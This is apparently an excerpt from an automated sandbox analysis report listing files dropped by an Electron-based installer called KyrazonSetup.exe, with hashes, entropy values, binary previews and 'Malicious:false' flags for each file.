                                                                                    SHA-512:072C5DB7FE1EB9E6C270D0E9B439CF84EBB3DC374D4F01F01F9341030883F2D6D9C6970FB6EF14BF96FCCB51EADE9CA762F396F89BA1D3DF1230DDA68557FD4A
                                                                                    Malicious:false
                                                                                    Preview:........N#..e.....h.....i.....j.....k.....l.9...n.A...o.F...p.S...q.Y...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................=.....k.........................................H...........2.....o...........T.....,.....g.........................................!.....U.....<...................................s...........?.....~.....G.........................................5.................c.......................i.........................................].....?.............................p............ ....6!....@".....".....#.....$.....%.....%.....%.....&.....'.....(....3(....,).....*.....*.....*.....+.....,....,-....`-...........0.....0....,1....'2.....3.....3.....3.....4....p5.....5.....6.....6.....7.....8.....8.....:....%;.....;....-<.....=.....=.....>....d>.....?.....@....-A.....A.....B.....D.....D....BE.....G.....I.....J.....J.....L....#M.....M....MN.....O.....P.....Q.....Q.....R.....S....^T.....T.....U.....W.....W

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\te.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1173901
                                                                                    Entropy (8bit):4.287514680628642
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:/jAoZvA07McKNnCRWtgd49+agb0DQWp5B63p1Fm6OiTlC2pFg+NFqUZrOIoXAoIm:s5G35xM/1
                                                                                    MD5:17B858CF23A206B5822F8B839D7C1EA3
                                                                                    SHA1:115220668F153B36254951E9AA4EF0AA2BE1FFC4
                                                                                    SHA-256:D6180484B51AACBF59419E3A9B475A4419FB7D195AEA7C3D58339F0F072C1457
                                                                                    SHA-512:7B919A5B451EC2BA15D377E4A3A6F99D63268E9BE2865D674505584EED4FA190EAAE589C9592276B996B7CE2FDFAE80FDA20FEFF9EA9ADBB586308DFD7F12C2A
                                                                                    Malicious:false
                                                                                    Preview:.........#N.e.h...h.p...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.-...|.3...}.E.....M.....R.....Z.....b.....j.....q.....x..................................................... .....h.....R...................................U.....p.....<.........................................T............................./.....g...........W.........................................:.......................A.....8.................v.......................V.........................................".....K...........{.............................A...... ....|!....."....e".....#....n$.....$....5%....U&....&'.....'.....'.....(.....)....C*.....*.....+....~,.....,....<-.........../....(0....g0....h1.....2....x2.....2.....3.....4....Z4.....4....Q5.....6.....6.....6....^8....[9.....9.....:.....;....8<.....<.....<.... >.....>.....?.....?.....A.....A....yB.....B.....D.....F....GG.....G.....I.....J.....J....FK.....L.....M.....N....eN....lO....4P.....P.....P....6R....1S.....S

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\th.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):987501
                                                                                    Entropy (8bit):4.326923937635645
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:OgFN2HN9LyZYA1T6z1L/LLftDjsAnILwgv1V5UBGsL3fBj8BlzEdq3Ro9lGdI9uN:OgFYdK5J5j
                                                                                    MD5:4917873D8118906BDC08F31AFB1EA078
                                                                                    SHA1:49440A3B156D7703533367F8F13F66EC166DB6E9
                                                                                    SHA-256:D051B400096922089F6DAA723FAC18C9640BA203B2879AAC4CA89B05738DD32D
                                                                                    SHA-512:30E6446BAD54B86BE553FA293C7A92EC221ADB54B99624ED69702DF75347A98697158041A45F77ECE4E7ED0FDA41306EF21EB27981F24F0A4E42E8306175A88E
                                                                                    Malicious:false
                                                                                    Preview:........."/.e.....h.....i.....j.....k.....l.....o.....p.....q.....r.....s.....t.....v.,...w.9...y.?...z.N...|.T...}.f.....n.....s.....{.......................................................................Y.......................<.....{.....C...........D.....n...........Q...........'.....`.....;.......................P.................Y...........".....;.....^.........................................[.....)...........T.....x.....C...........P.....w.....K...........d.......................k.................#.....{...............................................w...........p..... .......................@.......................Q.......................6.......................1.....................................................Z...........H ..... .....!....J!.....!....X".....".....".....$.....$....^%.....%.....&.....&....&'....V'....+(.....(.....)....J)....I*.....*....M+.....+.....,....t-..........=....../.....0....A1.....1.....2....L3.....3.....3.....4....D5.....5.....5.....6.....7...."8

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\tr.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):501122
                                                                                    Entropy (8bit):5.618531845968946
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:tgGjoIj9GAb0GKPRquxFX7gFZ7yMqPO4ppXHG42ge+54n/R+Pi1c2vdTAMTw/KUX:tgGHgo0G0RqU8wZHGe54n/C
                                                                                    MD5:55E06CD9356D0FB6F99932C2913AFC92
                                                                                    SHA1:AA5C532DDB3F80D2F180AD62CE38351E519A5E45
                                                                                    SHA-256:AFCBF02420DC724059F70D1DC6FFA51F5DD75136D9E1E8671D92D5D14955EDF9
                                                                                    SHA-512:813C180CB1AA205034497BE5FC8A631FF117E5ED17CDF0AC59B7569D74D849B385852A15BBADD3146F942C58BAB80D94BF0980D13CA4B4424D1CB1DF0CB1A2CD
                                                                                    Malicious:false
                                                                                    Preview:.........#1.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.%...v.:...w.G...y.M...z.\...|.b...}.t.....|...............................................................................................2.......................v.................K.................!.......................0.............................o.......................y.................(.................^.....{...........@.....r.................7.....a.....q...........].................7.......................o.......................o.......................l.......................l.........................................,.......................,.......................$.......................*.........../.....}.................\.......................O.....q.................6.....n.................W.......................`.......................S.....~.................g.................n.......................(...................................T.....p...........4.....d.....y...........R.......

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\uk.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):856077
                                                                                    Entropy (8bit):4.859457960004309
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:8Jzdfzlw5Cgnbz/T0hoaiJITt5eB3IjeAjmEFIOuHLNiXEqqbo3/d:KdfhAw56EL
                                                                                    MD5:381CB33C2D4FD0225C5C14447E6A84E0
                                                                                    SHA1:686B888228F6DD95ADE94FEE62EB1D75F3E0FC93
                                                                                    SHA-256:C2A6B16ABEAB6E18276BC1636555E93218763B9C99CACD0B42481B35E3A11820
                                                                                    SHA-512:F7A2828AA4CD85F07A5D66832F247F70951ABF34F81A282DC41EC51875BA70D940353D010B605C56CC59BEE47309AA311099D4E6EBD17F3C1538521D0CDDF4B6
                                                                                    Malicious:false
                                                                                    Preview:........%#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.$...t.-...v.B...w.O...y.U...z.d...|.j...}.|........................................................................................._.....C.......................^...........d...........Y.............................(.................s...........Z.........................................h.............................).....e.......................7...........v.......................c.............................:.....t...........m.................^.................;...........:.....x...........J...........H.....o.........................................T.....m...........|.................p...........>.....Y.....R.....".............................C.....e...........;.....d...........7...........V.....q.....f...................................>.....k........................ ..... ...._!.....!.....".....".....#....j$.....$....y%....=&.....&.....'.....'....F(.....(.....(....G).....).....*.... *.....*.....+.....,

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\ur.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):749985
                                                                                    Entropy (8bit):5.130337183789155
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:W2U9cmoa5DD8P4WrDD6yACLUj5DDPEFYW7BYcQYriwadcJKwUxuvco/9NjjFpvxR:1a8G5bWp
                                                                                    MD5:861FFD74AE5B392D578B3F3004C94CE3
                                                                                    SHA1:8A4A05317A0F11D9D216B3E53E58475C301D7EA5
                                                                                    SHA-256:B9F22A23368BF1E21F3085583ECB775CCE8045176721FF6AE798B06BD2810DBC
                                                                                    SHA-512:52EDE35B7ED1FB6E51B18E450B95C3245D326F2AFDA646E3642EE68B714DCF9A726AFE32E2759E9EA87A104F4A59E6FC2C60B3275AAD8332AE1C626231E6747B
                                                                                    Malicious:false
                                                                                    Preview:........e#n.e.(...h.0...i.8...j.D...k.S...l.^...n.f...o.k...p.x...q.~...r.....s.....t.....v.....w.....y.....z.....|.....}...........................................&.....-.........../.....4.....L.....f.................|.....>.......................T.......................z.....................................................j...............................................X...........N...........K...........,.................;...............................................5.................j.................{.................^.................*.................R.....l.........................................t...............................................I.....\...........g.......................C.............................@.....p...........Q.....~...........9.............................s.............................X.....{.....).................*...........z...........'............ .....!....T!....6"....."....`#.....#....j$.....%....g%.....%....-&.....&.....&.....'.....'....J(.....(

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\vi.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):592944
                                                                                    Entropy (8bit):5.79362677638915
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:9t12XV1+crwJ2roEw/aBuIZgsHXW0YYEDOr9g/C508jUmBnAi9wziMHQmwtm4:L12XX+crwJ2iaLZgsHG0Y3C508ImCi9v
                                                                                    MD5:4076D3C0C0E5F31CF883198C980D1727
                                                                                    SHA1:DB51B746216EA68803C98D7C1A5A2B45944359F3
                                                                                    SHA-256:F1458C4CE4CA708E849EB0C68A5157360EF003F3A9C95628D5CA12ADA303B379
                                                                                    SHA-512:80E4E960218F7D84423124C34352251411BAF008E821A344A0B6C2E7F1483694010F28B7DE21C7E2C69ABB4EC92E0D9CBDDEED6279B90C47245F4CBC500CDB77
                                                                                    Malicious:false
                                                                                    Preview:.........#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.1...w.>...y.D...z.S...|.Y...}.k.....s.....x.........................................................................................r.............................j...........3...........'.....M...........N.......................b.......................j.................U.................Q.................#.....Q...........b.................R.............................^.......................,.................0.......................J.......................e................."........... .....h.................U.......................g.......................t.................'.............................2.................7.......................y...................................N.......................B...........&.....[.....}...........z.................q...........'.....N...................................|.............................6.....O...........".....U.....i.........................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\zh-CN.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):428244
                                                                                    Entropy (8bit):6.66612560644761
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:rnmNoByFw9qnvdNzuIaG/7C5ccJu7kzDg5CJTNY6BoHHulW:r2oBew9qvfz/aJ5ccJuAg50TNY6BoT
                                                                                    MD5:3210460A24F2E2A2EDD15D6F43ABBE5F
                                                                                    SHA1:608FF156286708ED94B7AE90C73568D6042E2DBD
                                                                                    SHA-256:0F8D42D7F0B0B01AAFAD6AE79F0BD0CA518B2DB94287B09DF088BC093F15F605
                                                                                    SHA-512:F97427DBA4217E01A7ED395C453D03DDA4F2258CBA589258DA0EACFDE427BF442CDDEF541A23E7782914433E70A9623E904A5070DEBA9F9D50DDA20732EB5E86
                                                                                    Malicious:false
                                                                                    Preview:........."..e.2...h.:...i.B...j.E...k.T...l.[...m.c...o.i...p.n...q.t...r.....s.....t.....v.....w.....|.....}.......................................................!.....#.....(.....1.....=.....O.....a...........T.......................g.......................n.......................w.......................v.......................A.....h.....u...........".....H.....b...........=.....~.................L.......................2.....[.....g.................M....._...........4.....r.......................-.....G.............................V.......................3.......................;.............................s.......................Q.....y.................*.....S....._...........E.......................5.....U.....i.................6.....M.................(.....:.......................;.............................W.......................W.......................s...........,.....>.................B.....W.................-.....<.............................Z.......................V.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\zh-TW.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):424179
                                                                                    Entropy (8bit):6.677156018886683
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:svATQ4LawqVPkG49+J+k2i2iurW4hcv50Ynzq1TfAyn7zeGTs:sY/2mG4+CW4hcv50YnzeNn7I
                                                                                    MD5:F466116C7CE4962FE674383D543C87F6
                                                                                    SHA1:F65BF0DC1F1B15C132674FB8FF540F7D2AFE1D6E
                                                                                    SHA-256:FF3A294FD1AFB1FA7AAF53FBC4396643A12ED132633C5C86F14C16B88FA94A7B
                                                                                    SHA-512:4851A08069FCAC75E4051E53D4526789BFE6C393AB963E8263803BBF6E96CB150E9BA741650EFB5EE500E8A757D8512EB17DC268CEC1AB6FD3ACFAC62F7DA27D
                                                                                    Malicious:false
                                                                                    Preview:........."..e.....h.....i.....j.....k. ...l.+...n.3...o.8...p.@...q.F...r.R...s.c...t.l...v.....w.....y.....z.....|.....}...............................................................................'.................U.....g.................8.....D.................6.....H.................%.....7.............................`.......................<.......................0.......................(.............................e.......................`...............................................[.....o.......................9.....E.............................i.......................F.......................).............................e.......................>.....g.....s...........;.....p.......................0.....D.......................^.......................J.......................3.....s.......................=.....`.....r...........%.....T.....n...........Z........................................./.............................:.....O.....\.................-.....?.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):5483537
                                                                                    Entropy (8bit):7.995680005569416
                                                                                    Encrypted:true
                                                                                    SSDEEP:98304:+APFNXMmWPVctFCZcSENQjxh1Z/p6uNXrwrXRVunEVvXjAfz3hIkrT7s:+APFNXMddCM0Ghz/xpkrX2nEVvXGqkXA
                                                                                    MD5:E2088909E43552AD3E9CCE053740185D
                                                                                    SHA1:24B23DD4CAD49340D88B9CB34E54C3CA0EB0D27F
                                                                                    SHA-256:BBA36D4D18D64D9627F54C54FD645C5BA459D25A59ACC5228210BD707AEF67FD
                                                                                    SHA-512:DCEFACDDEC38D8941C7D2D7B971B6F22DD0ACB4116E48891D1D48A4D88968DA12B152CCB7591715C88F8E14C315E235D1C4E6852CC38B9246091C50226900DE6
                                                                                    Malicious:false
                                                                                    Preview:........@...f.....{.2*..|..-..~..0.....C....;E....iF....rQ......................+.................V...........q...........L.....l.....J..........<.....<.....<.....<c....<.....<"....</....<.....<.....<`3...<V:...<a>...<.>..I=.>..J=.C..K=.D..R=XI..S=.S..T=.a..[=s...\="...]=....^=...._=...`=(...a=....b=<...c=...e=r...f=.....=.....=.....=.....=.....=.....=4....=3....=7....=.....=.....E....+E....,E@...-E.....E. ../E.+..8E.<..9E.N..:E.`..BJ.l..CJ)y..DJ=...EJ...FJ....GJ\...HJr...IJ....JJ...KJZ...LJ....(K...)K....J[*...K[....L[.)..M[.+..N[G-..O[.0..P[.2..Q[.5...[.D...[.I...[.N...[o]...[d`...[.e...[.f...[Ah...\.i...\.r...\!x...\.~...\y....\....\8....\....\.....\....\Z....\.....\.....\!....\,....\.....\.....\.|...\........................>.....t...........t.....e...........1..........G.....M...........?...........n...........".........9.........b.........y.........<.....u.......7..........O....................o.........................a...........-.....1.....y.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):17041510
                                                                                    Entropy (8bit):6.741922775873898
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:bh/UcimDsWQkfOOXsW59ehUtHHwtJpQBx:tILjOc0yUVGQD
                                                                                    MD5:279351B702C1333465BE3ED423601AE9
                                                                                    SHA1:83BEE35945FE133B9D51F43BCAA6C306032C93E4
                                                                                    SHA-256:4C44C2BFD9892D4E93FE3D5D51A162D3C05347707E94D8A3808C314993BC8D2A
                                                                                    SHA-512:8892B44E0E8CFD8188AF5EBAB0E58A84C04BDCA5A87BFA7EE01DED14E659D77A40129A7B93601236B862754684BB54229AEFDA4B8614D6E1F3709B4D459E29F5
                                                                                    Malicious:false
                                                                                    Preview:....x@..t@..m@..{"files":{"node_modules":{"files":{"@gar":{"files":{"promisify":{"files":{"LICENSE.md":{"size":1094,"integrity":{"algorithm":"SHA256","hash":"ef7d10c21fe01e47a90973abda734e9be75162e5f561a84e95c5dcb9adbb89ea","blockSize":4194304,"blocks":["ef7d10c21fe01e47a90973abda734e9be75162e5f561a84e95c5dcb9adbb89ea"]},"offset":"0"},"index.js":{"size":967,"integrity":{"algorithm":"SHA256","hash":"a4fe100eb176ab95328881fe9490ac91e72d3d2992ac7fb2b9562d264156a8a3","blockSize":4194304,"blocks":["a4fe100eb176ab95328881fe9490ac91e72d3d2992ac7fb2b9562d264156a8a3"]},"offset":"1094"},"package.json":{"size":440,"integrity":{"algorithm":"SHA256","hash":"8012d0cdd159557951b1cb6e25177feb5e6f01d007f09adacf897335db41be99","blockSize":4194304,"blocks":["8012d0cdd159557951b1cb6e25177feb5e6f01d007f09adacf897335db41be99"]},"offset":"2061"}}}}},"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):2068
                                                                                    Entropy (8bit):5.069793714252897
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:xdI5XxNvisJtb8yxRBkfh4E6dwpoXT8+bSOavNO27NOHjoJOI4spo+kpRiYTRHX:jOhNvierxRBkfWipoXTStJ60usi+k+gX
                                                                                    MD5:7DD3BDF130A37BCD5E7DE4CF642150E1
                                                                                    SHA1:9CBF17699F354BA7213202E5510C770DE077BA49
                                                                                    SHA-256:34CCBDFCBB0B54AE4DB54D50D12C0B923AB1B8F485FF93C9C2F64FE3FB574F12
                                                                                    SHA-512:35761D3536B6441DAB32E6394880915239A862E2E98C60E88A261887438BC308652776EB507775CF93D4B45050AC1CDE2E5CCF2088F494EA2AACE88F3A48DB1A
                                                                                    Malicious:false
                                                                                    Preview:.Shortcut [Version 1.11]..Creates, modifies or queries Windows shell links (shortcuts)...The syntax of this command is:..Shortcut.exe /F:filename /A:C|E|Q [/T:target] [/P:parameters] [/W:workingdir]. [/R:runstyle] [/I:icon,index] [/H:hotkey] [/D:description].. /F:filename : Specifies the .LNK shortcut file.. /A:action : Defines the action to take (C=Create, E=Edit or Q=Query).. /T:target : Defines the target path and file name the shortcut points to.. /P:parameters : Defines the command-line parameters to pass to the target.. /W:working dir : Defines the working directory the target starts with.. /R:run style : Defines the window state (1=Normal, 3=Max, 7=Min).. /I:icon,index : Defines the icon and optional index (file.exe or file.exe,0).. /H:hotkey : Defines the hotkey, a numeric value of the keyboard shortcut.. /D:description : Defines the description (or comment) for the shortcut... Notes:. - Any argument that contains spaces must be enclosed in "double

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):57344
                                                                                    Entropy (8bit):4.777530479814042
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:p8AcstBy9afhyO45SqNf/mmjVrqvn84Bhbrqtuv:p5csny9TVheqhQn8Igt+
                                                                                    MD5:59375510BDE2FF0DBA7A8197AD9F12BB
                                                                                    SHA1:B7AEF73FD5C9610860E2F3F6A3B8A21CB6873261
                                                                                    SHA-256:74CD07EF186D995AD75A0C2A153D1DD6F7B563987F5AA0FEFEF0A095708C02DD
                                                                                    SHA-512:EAA013B4885A4F05E998366317FE5BC46B7057C1F29653004787B0A6C40B445728A8EC63D0FA577E56293C34A27B508B7CC17A7A6AC95DE3C42541A51ECD12CC
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.=...S...S...S..]...S.".Y.'.S.......S.......S...R.".S.".X...S...U...S.Rich..S.........................PE..L...y;.B.................p..........k-............@.........................................................................x...P....................................................................................................................text...(i.......p.................. ..`.rdata..n...........................@..@.data....T.......@..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4634
                                                                                    Entropy (8bit):5.188773568132433
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:9TZeep5yuqi1CMzUucscpvqZMhhqYouHmGSGAs4BNOpAwSqjcOaUYR2INdIvcEW/:9TZePGCMzUlHpCuSSHmGFA7BUpAKjcYM
                                                                                    MD5:6A189C41A3363A8AE600243C952EDB05
                                                                                    SHA1:15980EBB621ED3936B2BCCDF7F2C3294D57219E5
                                                                                    SHA-256:ACC3C7E29780AEE7923B101855E25BD53CF6081F7553720F9DCEFE6116EF891C
                                                                                    SHA-512:B18297C5E83B22ABB022DDD7622F187BDDEFB7D3E4ECBA0D7FDB65D7926FE0F8107F1DC82005EE4AF9B41C2993888576D60A637AD141F0C7A9BC75DCC00B16D8
                                                                                    Malicious:false
                                                                                    Preview:var execFile = require('child_process').execFile;.var pathUtils = require('path');../*. * options object (also passed by query()). * target : The path the shortcut points to. * args : The arguments passed to the target as a string. * workingDir : The working directory of the target. * runStyle : State to open the window in: ws.NORMAL (1), ws.MAX (3), or ws.MIN (7). * icon : The path to the shortcut icon file. * iconIndex : An optional index for the image in the icon file. * hotkey : A numerical hotkey. * desc : A description. */..function parseQuery(stdout) {..// Parses the stdout of a shortcut.exe query into a JS object..var result = {};..result.expanded = {};..stdout.split(/[\r\n]+/)....filter(function(line) { return line.indexOf('=') !== -1; })....forEach(function(line) {.....var pair = line.split('=', 2),.....key = pair[0],.....value = pair[1];.....if (key === "TargetPath")......result.target = value;.....else if (key === "TargetPathExpanded")......result.expanded.target = value;..

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):577
                                                                                    Entropy (8bit):4.877056753350964
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:y1CBJ+rLgoPF8i81mbmF2P9nEP7oh1uj7HxY:y1CBJ0cG127oh0q
                                                                                    MD5:D35A29EB509D52F43AD8D7D7E57557CA
                                                                                    SHA1:73E4A065CFCA688E7F6813AF77BBD5DDB63F7148
                                                                                    SHA-256:540B79DE6A1C3583C8255B304849701744A9A640FA45F10B64EC983BE7BD408A
                                                                                    SHA-512:B722F588A5E49EB787D0F9AC266F50BACCF5FD3BD9F3023DC70833FB68F84605571FBAF8C459BFDE902C98F4572132FB8590EE03548ED6FD5F53DE5D30D5A90C
                                                                                    Malicious:false
                                                                                    Preview:{. "name": "windows-shortcuts",. "version": "0.1.6",. "description": "Create, edit, and query Windows shortcuts (.lnk files)",. "license": "MIT",. "author": "j201 <j201.alex@gmail.com> (http://j201.github.io)",. "main": "./lib/windows-shortcuts",. "typings": "./lib/windows-shortcuts.d.ts",. "repository": {. "type": "git",. "url": "git://github.com/j201/windows-shortcuts.git". },. "homepage": "http://github.com/j201/windows-shortcuts",. "devDependencies": {. "signal-exit": "^2.1.2",. "tape": "^4.4.0",. "tmp": "0.0.28",. "touch": "^1.0.0". }.}

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):107520
                                                                                    Entropy (8bit):6.442687067441468
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                    MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                    SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                    SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                    SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\snapshot_blob.bin

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):267462
                                                                                    Entropy (8bit):4.19770221494855
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:8LuAqiYp4bhaz8Le7ICHKhsqdzoGq/p2Vy:hiHbhaMAIyAsqxip2Q
                                                                                    MD5:6FCB8A6C21A7E76A7BE2DC237B64916F
                                                                                    SHA1:893EF10567F7705144F407A6493A96AB341C7CCF
                                                                                    SHA-256:2BCEEF4822CA7CC3ADD4A9DCB67C51EFB51C656FCE96A3B840250DE15379959C
                                                                                    SHA-512:3B745740BBBE339542EF03FD15DD631FB775E6BF8CA54D6D2B9CEAD3AA5AAFC4CAB49E507BC93641E581412BBEB916A53608D5F5D971EA453779E72D2294DAFB
                                                                                    Malicious:false
                                                                                    Preview:........a...1.Nk11.8.172.18-electron.0...........................................@..fT...l...........?..a........a........a........ar.......a8.......a............e....f...bf....f..."g....g....g...Bh....h....i...bi....i..."j..(Jb...)L.....@..F^.1..5.`.....(Jb...-P.....@..F^..`.....H...IDa........Db............D`.....-.D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.......................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\v8_context_snapshot.bin

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):626313
                                                                                    Entropy (8bit):5.180772010538009
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:jMWiyz4J+1OFZAsXbJ8qPOzhXvKwvrBTbvUyMR/GLrOp:j2+lOF4h/DvNHvUiap
                                                                                    MD5:1A37F6614FF8799B1C063BC83C157CC3
                                                                                    SHA1:8238B9295E1DDE9DE0D6FD20578E82703131A228
                                                                                    SHA-256:4FBE07F71B706C2A2948EBA9A6B1979E23C83342B190723A6EC5251B2D6DAD7C
                                                                                    SHA-512:6677F65A0E26FDC2CFF6CEF0231F5E5F0713EE7C5CF7F488599A3C7AC3E8365AFAEC10B35D6145EA58D364151D8BCB08308765693A9797EA99B894D6E8224AC7
                                                                                    Malicious:false
                                                                                    Preview:..........N5<Dk11.8.172.18-electron.0..............................................1....8.......E..........0...a........a........aT.......ar.......a8.......a............e....f...bf....f..."g....g....g...Bh....h....i...bi....i..."j..(Jb...)L.....@..F^.1..5.`.....(Jb...-P.....@..F^..`.....H...IDa........Db............D`.....-.D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L...............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):5180416
                                                                                    Entropy (8bit):6.360585559792186
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:56h3a0f1ABi1jP9LoS8lne0Zv8EgHI7JXYN3bgFNmEgMYmz2qA0Mr7wsVUsNCOzZ:sh3aMXoSHfPwksHldLiuNr
